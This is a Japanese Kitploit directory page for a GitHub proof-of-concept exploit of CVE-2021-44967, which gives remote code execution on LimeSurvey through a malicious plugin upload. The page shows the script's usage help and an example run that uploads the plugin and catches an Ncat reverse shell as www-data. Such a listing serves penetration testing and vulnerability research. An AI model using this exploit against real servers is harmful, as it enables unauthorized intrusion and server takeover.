Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-44967 — CVE-2021-44967 の概念実証エクスプロイト。悪意のあるプラグインのアップロードを介して LimeSurvey 5.2.4 でリモートコード実行を可能にし、リバースシェル機能を備えています。 | Kitploit
ツール/GitHubGitHub/godylockz/cve-2021-44967
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubgodylockz/cve-2021-44967

CVE-2021-44967

CVE-2021-44967 の概念実証エクスプロイト。悪意のあるプラグインのアップロードを介して LimeSurvey 5.2.4 でリモートコード実行を可能にし、リバースシェル機能を備えています。

リポジトリを見る
121年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-44967: LimeSurvey RCE

説明

このProof-of-Concept(POC)は、CVE-2021-44967を悪用して、管理者として悪意のあるLimeSurvey PHPプラグインをアップロード・実行し、リバースシェルを取得するために使用できます。

LimeSurvey 5.2.4には、プラグインのアップロードおよびインストール機能を介したリモートコード実行(RCE)の脆弱性が存在します。これにより、リモートの悪意のあるユーザーが任意のPHPコードファイルをアップロードできる可能性があります。

深刻度: 8.3 HIGH ベクトル: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Usage

root@kitploit:~
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
                         [--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]

POC for CVE-2021-44967 (LimeSurvey RCE)

options:
  -h, --help            show this help message and exit
  -t, --url URL         LimeSurvey Target URL
  -u, --username USERNAME
                        LimeSurvey username
  -p, --password PASSWORD
                        LimeSurvey password
  -f, --file FILE       Custom PHP payload file
  --listen-ip LISTEN_IP
                        Listening IP / Interface
  --listen-port LISTEN_PORT
                        Listening Port
  -a, --useragent USERAGENT
                        User agent to use when sending requests
  -x, --proxy PROXY     HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag

Example

root@kitploit:~
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shelll ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

LimeSurvey Community Edition バージョン 6.6.4 でテスト済み。

参照

  • CVE-2021-44967
  • オリジナルPOC
ツールをダウンロード